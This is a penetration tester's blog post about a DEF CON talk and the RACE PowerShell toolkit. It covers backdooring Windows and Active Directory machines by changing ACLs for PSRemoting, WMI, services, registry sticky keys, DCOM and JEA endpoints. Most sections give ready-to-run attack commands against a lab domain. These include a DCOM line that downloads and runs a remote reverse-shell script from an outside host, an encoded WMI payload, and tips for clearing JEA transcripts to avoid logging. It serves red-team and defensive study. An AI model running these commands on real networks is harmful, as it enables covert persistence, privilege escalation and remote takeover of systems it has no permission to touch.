tag:blogger.com,1999:blog-81352110635845009092024-03-06T06:46:36.497+05:30Lab of a Penetration TesterHome of Nikhil "SamratAshok" MittalNikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.comBlogger72125tag:blogger.com,1999:blog-8135211063584500909.post-12315790393146076782019-08-23T23:07:00.000+05:302019-08-29T12:29:03.544+05:30RACE - Minimal Rights and ACE for Active Directory Dominance<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I recently spoke at DEF CON 27 on abusing Security Descriptors and ACLs i.e. permissions on Windows machines. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can find the slides <a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance.pdf">here</a> (also at the end of the post with minor updates). The demo videos which I used for my talk can be found <a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Nikhil-Mittal-RACE-Minimal-Rights-and-ACE-for-Active-Directory-Dominance-Demo-Video/">here</a> on and are also used below. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The RACE toolkit is available on my GitHub repository.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This blog post covers whatever I could not do in my talk. There is only so much you can cover in 45 minutes. On top of that, there was some confusion and my talk was cut short by 10 minutes -.-</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
tldr; It is possible to execute interesting persistence and on-demand privilege escalation attacks against Windows machines by only modifying ACLs of various objects. We will need administrator privileges initially. <br />
<br />
So, let's begin.<br />
<br />
We are going to use 'labuser' as the attacker controlled user and 'ops' is the target domain.</div>
<div style="text-align: justify;">
<br /></div>
<h4 style="text-align: justify;">
About Windows Access Control Model:</h4>
<div style="text-align: justify;">
Microsoft's <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-components">documentation on Access Control Model</a> explains it really well. But below is a quick summary:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Every authenticated user gets an access token. Each process or thread created by that user has a copy of that access token. The token contains identity (SIDs) and privileges of the user. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, when a process tries to access a <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects">securable object</a> (Files, Registry Keys, Services, Domain Objects etc.) it uses the access token. A securable object, by definition, has a security descriptor. A security descriptor can contain <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists">Access Control List (ACL)</a> which is a list of <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings">Access Control Entries (ACE)</a>. There are two types of ACLs Discretionary Access Control List (DACL) and SACL (System Access Control List). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
DACL controls access to an object and SACL controls logging of access attempts. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, when a process or thread tries to access a securable object, the system checks the permissions for the access token (and therefore the user) against each ACE in DACL. The process gets access in case of an explicit allow or if there is no DACL. All other cases result in an access denied. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
An ACE contains access control information. The relevant information to this discussion is access mask. <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-rights-and-access-masks">The access mask in an ACE contains access rights</a>. This governs what a user can do on an object. For example, a user may have permissions to stop a process whereas another may have the access rights to configure a process. This is what defines access in Windows. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<h4 style="text-align: justify;">
Minimal Permissions</h4>
<div style="text-align: justify;">
Once we have understood the concept, let's think what makes a Domain Admin so powerful? </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A Domain Admin is so powerful because it has permissions to modify almost all objects on machines in a domain. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Do we need Domain Admin privileges for all the interesting things? Not really! We can use just enough rights to perform a particular task. That is, in place of having FullControl or GenericAll over an object we can use Minimal Permissions required to perform a task. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For example, what allows a user to connect to a remote machine using PowreShell Remoting? By default, administrator rights are required. If we have a look at the ACL of the PowerShell Remoting Endpoint we understand that the Administrators group has FullControl over it:</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrrDoskf8tosvfMtnLIHPN0V1fLqKVa5-Kedk_ZCOQxU_yi_e_EbV5_iXLgskKYY3pGPYQW9tDsFyN0KRMNHknw08D7TnfszErW8W_JsD97C5o6-Cl6r5TqBjuU0DYLHvnFnnj7lsju1I/s1600/PSRemoting_DACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="562" data-original-width="453" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrrDoskf8tosvfMtnLIHPN0V1fLqKVa5-Kedk_ZCOQxU_yi_e_EbV5_iXLgskKYY3pGPYQW9tDsFyN0KRMNHknw08D7TnfszErW8W_JsD97C5o6-Cl6r5TqBjuU0DYLHvnFnnj7lsju1I/s400/PSRemoting_DACL.png" width="321" /></a></div>
Do we actually need 'FullControl' to access the target machine using PowerShell Remoting? No! We can connect to the target machine by adding an ACE for a user which we control and provide it Read, Write and Execute permissions. This will allow the user to access the target machine using PSRemoting without admin privileges. Please note that the user's privileges on the target machine will not be elevated!<br />
<br />
This is what we are going to focus on. Some interesting backdoor/persistence techniques, some on-demand privilege escalation methods by modifying ACLs of various securable objects.<br />
<br />
<h4>
Introducing the RACE toolkit</h4>
To make it easy to execute ACL related attacks, I have written the RACE toolkit. RACE is dervied from Minimal <b>R</b>ights and <b>ACE</b>. You can find it on my GitHub : <a href="https://github.com/samratashok/RACE">https://github.com/samratashok/RACE</a><br />
<br />
RACE is a PowerShell module for executing ACL attacks against Windows targets. <br />
<br />
RACE uses the ActiveDirectory module for some of the attacks (Set-ADACL and Set-DCPermissions functions). You can get it from a machine where AD DS RSAT is available or from here: <a href="https://github.com/samratashok/ADModule">https://github.com/samratashok/ADModule</a></div>
<br />
<h4 style="text-align: justify;">
Persistence - PowerShell Remoting</h4>
<div style="text-align: justify;">
As we saw above, it is possible to access a target machine as a non-admin user using PSRemoting by modifying the ACL of the PSRemoting endpoint. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using the below commands from RACE, we can modify the ACL of the default PSRemoting endpoint. Let's run it on the DC with DA privileges (please ignore 'I/O operation has been aborted'):</div>
</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">. .\RACE.ps1
Set-RemotePSRemoting -ComputerName ops-dc -SamAccountName labuser –Verbose
</textarea></pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHNKIW3TIuvI0c3tsNHpokdo5HbQnqSGVIGTH5uHUa40o3Y2UQl16e2BpnDzeeoxUr5zbq2EqyUX_azT6uIuq8FXkoYZWZ9Fs1DUlH9NvKQRwnuNUYK_Qg_YXcoMSJgzvo33z3i87WqE/s1600/Set-PSRemoting-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="1461" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPHNKIW3TIuvI0c3tsNHpokdo5HbQnqSGVIGTH5uHUa40o3Y2UQl16e2BpnDzeeoxUr5zbq2EqyUX_azT6uIuq8FXkoYZWZ9Fs1DUlH9NvKQRwnuNUYK_Qg_YXcoMSJgzvo33z3i87WqE/s400/Set-PSRemoting-DA.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
Now, we will be able to access the target machine 'ops-dc' as labuser using PowerShell Remoting. Please note that the privileges will still be of labuser.</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Enter-PSSession -ComputerName ops-dc
</textarea></pre>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17h924OsnLJSBZW9r_GZP5Uk9cEIx9oFiD_funJzyLsyvo755yIuuDy174dugfJbXoKQjuK8bmvMSoPO16MYvXDaOB0rVKezdpCfcLRCHIIC2sSvo0OBid-3GEF2Vn6Eiq65ydcp04js/s1600/Set-PSRemoting-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="534" data-original-width="1600" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17h924OsnLJSBZW9r_GZP5Uk9cEIx9oFiD_funJzyLsyvo755yIuuDy174dugfJbXoKQjuK8bmvMSoPO16MYvXDaOB0rVKezdpCfcLRCHIIC2sSvo0OBid-3GEF2Vn6Eiq65ydcp04js/s400/Set-PSRemoting-labuser.png" width="400" /></a></div>
<div style="text-align: justify;">
Here is a video of the above attack: <br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/CqVV6Iqwsn0" width="560"></iframe><br />
<br />
<br />
There are no logs for the ACL modification of PowerShell endpoints. Although, when accessing the target machine there will be Events 4624 (Logon) and 4634 (Logoff). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
How is this access useful? We can chain this with other modified permissions. We will come back to that later.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
UPDATE 29/02/2019 - Forgot to mention that this is useful against PowerShell Web Access too. If we have credentials of lab user and PSWA is enabled on the target machine, we can access the target machine using the credentials. </div>
<h4>
Persistence - WMI</h4>
<div style="text-align: justify;">
Similarly, we can modify ACLs to access a machine using WMI without admin privileges. In case of WMI, we need to modify ACLs for DCOM endpoint and also for namespaces. For namespaces, we can do it for all of them or only a specific one. The below command does it for all the namespaces:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteWMI -ComputerName ops-mssql -SamAccountName labuser –Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueJNwfx4rR6sXE9sUqNWl5pVjkFcuOX9tP2178xh82_EPYYNHdvIKp3NJeouGStPpr0tJ1rkMMp9_L3otuJZ-716R6IwPY7zJlHBCIadkSOYIf59vkUH_ILRcZa3ezjPTeHcgKDC8tWg/s1600/WMI-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="312" data-original-width="1457" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjueJNwfx4rR6sXE9sUqNWl5pVjkFcuOX9tP2178xh82_EPYYNHdvIKp3NJeouGStPpr0tJ1rkMMp9_L3otuJZ-716R6IwPY7zJlHBCIadkSOYIf59vkUH_ILRcZa3ezjPTeHcgKDC8tWg/s400/WMI-DA.png" width="400" /></a></div>
Now, we can simply run commands as 'labuser' on the target machine:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-WMIMethod -Class win32_process -Name Create -Argumentlist 'powershell -e base64encodedpayload'
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx1pZm78hFxunA-Oc92nLONYeXI2aZt9fN8jrl7kVx8Lt49ky4BolMq706Wkyg_Vz5LpudGvWO2PHhfMRsvQznIsbpw_zwwF4hOHZ183wq1tlwgVapSI-lfRYm6lyXUZK-Ewdn0ARYTUM/s1600/WMI-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="445" data-original-width="1320" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx1pZm78hFxunA-Oc92nLONYeXI2aZt9fN8jrl7kVx8Lt49ky4BolMq706Wkyg_Vz5LpudGvWO2PHhfMRsvQznIsbpw_zwwF4hOHZ183wq1tlwgVapSI-lfRYm6lyXUZK-Ewdn0ARYTUM/s400/WMI-labuser.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
<b>WMI Permanent Event Consumers - </b>In my testing, with modified permissions to the root\subscription namespace it was possible to create permanent event consumers but the payload never executed. This is something which someone else can explore. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Like PSRemoting, there are no logs for ACL modification but logs 4624 and 4634 will be there when we use WMI to access the target machine.</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: justify;">
<br />
On-demand Privilege Escalation - Windows Services</h4>
<div style="text-align: justify;">
Windows services are very useful for persistence AND getting admin privileges back.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Here is how we can abuse admin privileges with windows services: </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- Initially with admin privileges, we can create new services or modify existing services to run as SYSTEM. </div>
<div style="text-align: justify;">
- We also modify ACLs of such services to allow permissions to config and restart for a user we control. </div>
<div style="text-align: justify;">
- As the user we control, reconfigure the target service on the target machine to change its executable path to our payload. </div>
<div style="text-align: justify;">
- Restart the service to execute the payload. </div>
<div style="text-align: justify;">
<br />
<b>Creating new service:</b></div>
<div style="text-align: justify;">
Use the below command to provide labuser GenericAll rights over scmanager (needs admin rights):</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-build -ServiceName scmanager -Verbose
</textarea></pre>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmek396a3jNTLqAHYR7yr3Uluq-TVmidVw72FDq4wehek6UqaWEG8NegEgrO_aDelA_vZ7lo43PdqybdKjocddGFFv60d6Im4XpFfr_mHmx5gBZq19gwnyzM-WYb2B611otv6JvPBQfg8/s1600/Set-RmeoteServices-SCManager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="221" data-original-width="1439" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmek396a3jNTLqAHYR7yr3Uluq-TVmidVw72FDq4wehek6UqaWEG8NegEgrO_aDelA_vZ7lo43PdqybdKjocddGFFv60d6Im4XpFfr_mHmx5gBZq19gwnyzM-WYb2B611otv6JvPBQfg8/s400/Set-RmeoteServices-SCManager.png" width="400" /></a></div>
SCManager is a special service which provides the ability to create new services on a machine. After the above command, labuser can create services on the target machine:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServiceAbuse -ComputerName ops-build -UserName 'ops\labuser' -CreateService evilsvc -SamAccountName labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge8kYOnlozGZigU4oWcLjpFe0-Di1oPPZaGK0ZXJYmwSUZLopxcP5A9-lyTl5NtH8qHnpFMqNv0c1no6hJX_dCQnZhCHoDZqbsDEO8NUQGrlWB8Hzf_sR8xiwyG5Uz0fhSgG74yCwYFpQ/s1600/Set-RmeoteServices-SCManager-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="189" data-original-width="1600" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge8kYOnlozGZigU4oWcLjpFe0-Di1oPPZaGK0ZXJYmwSUZLopxcP5A9-lyTl5NtH8qHnpFMqNv0c1no6hJX_dCQnZhCHoDZqbsDEO8NUQGrlWB8Hzf_sR8xiwyG5Uz0fhSgG74yCwYFpQ/s400/Set-RmeoteServices-SCManager-labuser.png" width="400" /></a></div>
The above command sets the service start type to auto and the account to LocalSystem. The binpath or executable of the service is set to the specified payload. By default, the payload is to add the user specified by UserName parameter to the local administrators group.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
After the above command, we can either wait for the service restart or a system reboot:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you don't want to wait, run the below command (suggested by the tool) with admin privileges on the target machine to get restart permissions for the created service for our user: </div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ServiceName evilsvc -ComputerName ops-build -Verbose
</textarea></pre>
</div>
<div style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ6A_aEMIAffwF4gzjYk7Kqe7ugOOtFy4JVM1x6TM0n8vOgjGwVCPQ2JyoCQ1l1BKWtZ3Yim4MhIbCYONHuu0rYZhF7YmjwyDY3QJdxvGufylgA-nW27sNnXEd4jA-q5mWFzb9YWNZqaM/s1600/Set-RmeoteServices-SCManager-ACL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="139" data-original-width="1437" height="37" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJ6A_aEMIAffwF4gzjYk7Kqe7ugOOtFy4JVM1x6TM0n8vOgjGwVCPQ2JyoCQ1l1BKWtZ3Yim4MhIbCYONHuu0rYZhF7YmjwyDY3QJdxvGufylgA-nW27sNnXEd4jA-q5mWFzb9YWNZqaM/s400/Set-RmeoteServices-SCManager-ACL.png" width="400" /></a></div>
<br />
<div style="text-align: justify;">
Now, when we restart the 'evilsvc' service, 'labuser' is added to the local administrators group on the target machine.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">sc.exe \\ops-build start evilsvc
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnlfFHtKJhwT9T-1XHf0_ttHGbu0KrzZdLZXAg3V0bNfMWypTKquBlaXNJtUbSIu6SP82j5wyO3ZNob7zeD3Wp-MU5MCzEQT0UhFqJ4LclBvldAvV5j3s27H2dD44OCLwOvl1YPLKLhc/s1600/Set-RmeoteServices-SCManager-labuserlocaladm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="448" data-original-width="1021" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnlfFHtKJhwT9T-1XHf0_ttHGbu0KrzZdLZXAg3V0bNfMWypTKquBlaXNJtUbSIu6SP82j5wyO3ZNob7zeD3Wp-MU5MCzEQT0UhFqJ4LclBvldAvV5j3s27H2dD44OCLwOvl1YPLKLhc/s400/Set-RmeoteServices-SCManager-labuserlocaladm.png" width="400" /></a></div>
<br />
<b>Modifying existing service:</b> <br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With admin equivalent permissions (CCDCLCSWRPWPDTLOCRSDRCWDWO) on any service, we can abuse it to escalate privileges. Please refer to the <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/ace-strings">documentation</a> for a full list of the rights. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The below command modifies the ACL of ALG service on the target machine to provide 'labuser' enough rights to configure and restart the service:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServicePermissions -SamAccountName labuser -ComputerName ops-build -ServiceName ALG -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOsb5kEuLxBQVFpixkTrWdPBQekrZJML4pQ6KSj3SIdhCHyT4DPK6w-C4jRLM4Aqc8BMk5eDln2JKcI6HMtgoiSCLkmiwyvjB01JQnK73rhaOaqxn3_YkdXNUKI9M_K4XyVoMS3EoU3I0/s1600/Set-RmeoteServices-ALG.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="179" data-original-width="1440" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOsb5kEuLxBQVFpixkTrWdPBQekrZJML4pQ6KSj3SIdhCHyT4DPK6w-C4jRLM4Aqc8BMk5eDln2JKcI6HMtgoiSCLkmiwyvjB01JQnK73rhaOaqxn3_YkdXNUKI9M_K4XyVoMS3EoU3I0/s400/Set-RmeoteServices-ALG.png" width="400" /></a></div>
Next, run the below command as labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-RemoteServiceAbuse -ComputerName ops-build -UserName 'ops\labuser' -ServiceName ALG -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5m3x1NOVYOYBh9Z-equFt4_5q1F9rD9XKpRJ5aTPIYkdCh7BtOhRENwYUlFJYR-kXZHmh46PT8voPTQT9FLUoXwdCymLOQlr_URx5DW_OAWvXMASggVaDr2lmo0MvITiLgTn17bVqH48/s1600/Set-RmeoteServices-ALG-localadm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="502" data-original-width="1562" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5m3x1NOVYOYBh9Z-equFt4_5q1F9rD9XKpRJ5aTPIYkdCh7BtOhRENwYUlFJYR-kXZHmh46PT8voPTQT9FLUoXwdCymLOQlr_URx5DW_OAWvXMASggVaDr2lmo0MvITiLgTn17bVqH48/s400/Set-RmeoteServices-ALG-localadm.png" width="400" /></a></div>
<br />
Now, when we restart the ALG service, labuser is added to the local administrators group on the target machine.<br />
<br />
Below is a video of the attack:</div>
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/qIzyZhbnQ18" width="560"></iframe><br />
<br />
<div style="text-align: justify;">
<br />
I prefer using an existing service in place of creating a new one. <br />
<br /></div>
<div style="text-align: justify;">
Please note both the methods are verbose in the logs. Service creation, service configuration changes and service stop/start is logged. Therefore, this method is not recommended on DCs or when you want to be stealthy. </div>
</div>
<div style="text-align: left;">
</div>
</div>
<br />
<h4 style="text-align: left;">
On-demand Privilege Escalation - Registry Autoruns</h4>
<div style="text-align: justify;">
Windows registry is a very attractive target for persistence with on-demand privilege escalation. As a very simple example, let's have a look at Image File Execution Options which is a <a href="https://www.rapid7.com/db/modules/post/windows/manage/sticky_keys">popular</a> <a href="http://www.labofapenetrationtester.com/2012/05/fun-with-sticky-keys-utilman-and.html">method</a> of running a payload as SYSTEM using 'sticky keys'. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The idea is to modify the ACL of the Registry key responsible for Remote Registry (HKLM:\ SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg) and for sethc.exe (HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe) to be able to change registry remotely without needing admin privileges. To be able to trigger this remotely on a RDP logon session, NLA needs to be disabled by modifying (HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp).<br />
<br />
Run the below commands with admin privileges on the target machine to setup the registry key permissions:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Set-RemoteRegistryPermissions -SamAccountName labuser -ComputerName ops-mssql -Verbose
Set-RegistryImageFileExecution -SamAccountName labuser -ComputerName ops-mssql -Verbose
</textarea></pre>
</div>
<br />
<div style="text-align: justify;">
Then run the below command as labuser to set payload for sethc and to disable NLA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-RegistryAbuse -ComputerName ops-mssql -Method ImageFileExecution -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, try to connect to the target machine using RDP and press the Shift key five times to get a command prompt with SYSTEM privileges!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The particular method we used is not very silent (even some AVs flag modification of Image File Execution Options registry key) and actually downgrades the security of the target machine. So please use this carefully in an actual operation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Implementing some better registry key based command execution is something which is in future goals of the RACE tool.</div>
<br />
<h4 style="text-align: left;">
Persistence - DCOM</h4>
<div style="text-align: justify;">
We can modify the ACL of the DCOM endpoint (recall that we already did that while abusing WMI) for persistence. Like WMI, we will have command execution with the privileges of only the current user. But as we will see soon, something like that is very helpful when chained with other ACL modifications. </div>
<br />
<div style="text-align: justify;">
Run the below command with admin rights on the target machine to modify ACL of DCOM endpoint:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCOMPermissions -UserName labuser -ComputerName ops-mssql -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, run the below command as labuser to execute commands using DCOM on the target machine. By default, the method used for execution is <a href="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/">MMC20.Application</a> class.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-DCOMAbuse -ComputerName ops-build -Method MMC20 -Arguments 'iex(iwr -UseBasicParsing http://192.168.100.31:8080/Invoke-PowerShellTcp.ps1)'
</textarea></pre>
<br />
<h4 style="text-align: left;">
On demand Privilege Escalation - Just Enough Administration (JEA)</h4>
<div style="text-align: justify;">
JEA is a PowerShell v5 feature which provides control over administrative tasks by providing PowerShell Remoting endpoint with:</div>
<div style="text-align: justify;">
- Virtual accounts - temporary local accounts which are local admin on member machines and DA on DCs but no rights to manage resources on network. </div>
<div style="text-align: justify;">
- Ability to limit the cmdlets and commands which a user can run through Role Capabilities. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
JEA is designed to 'allow non-admins to do some admin tasks' with 'least privileges'. This is precisely what we have been doing so far. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
So, JEA provides admin rights to anyone who is explicitly allowed to connect to the endpoint. But the control on those administrative rights is because of the commands and cmdlets they can execute as a JEA session starts in NoLanguage mode. Only explicitly allowed commands and cmdlets are allowed. It is possible to only allow a single command with only one parameter or argument allowed!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
JEA endpoints also have transcripts enabled so that all the commands and their outputs are written to a flat text file. In addition to that, Event logs for 'WinRM Virtual Users\WinRM_VA_<i>AccountNumber</i>_<i>domain_username</i>' will be logged. PowerShell script block logging may also log any suspicious logs. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With all these checks, how can we abuse JEA? Look at the <a href="https://docs.microsoft.com/en-us/powershell/jea/security-considerations">JEA Security Considerations</a> for some evil ideas ;) </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With admin privileges on the target machine, we can Register a new JEA endpoint, allow all the cmdlets and commands and allow a user we control to connect to it. We can set the transcript log path to user's temp directory and clear the transcripts when we connect to the machine. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's use this against a DC. Run the below command with DA privileges to create a JEA Endpoint 'microsoft.powershell64' which allows access to labuser:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-JEAPermissions -ComputerName ops-dc -SamAccountName labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpyYY76yS1f7DXENfOtJXh4CO6csohyphenhypheneftPvzbdKlL-nmOgbgXMwGS82uFWz9GkG-KWzCCuyqrfo9fvcii9Wclabgc-iVfTHN6a6qhebBcZ-yyh9z28I66SNi4bshy7PVr_WwROP_V4W8/s1600/JEA-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="512" data-original-width="1403" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpyYY76yS1f7DXENfOtJXh4CO6csohyphenhypheneftPvzbdKlL-nmOgbgXMwGS82uFWz9GkG-KWzCCuyqrfo9fvcii9Wclabgc-iVfTHN6a6qhebBcZ-yyh9z28I66SNi4bshy7PVr_WwROP_V4W8/s400/JEA-1.png" width="400" /></a></div>
Now, as labuser we can access the DC and get DA privileges for local context:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Enter-PSSession -ComputerName ops-dc -ConfigurationName microsoft.powershell64
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
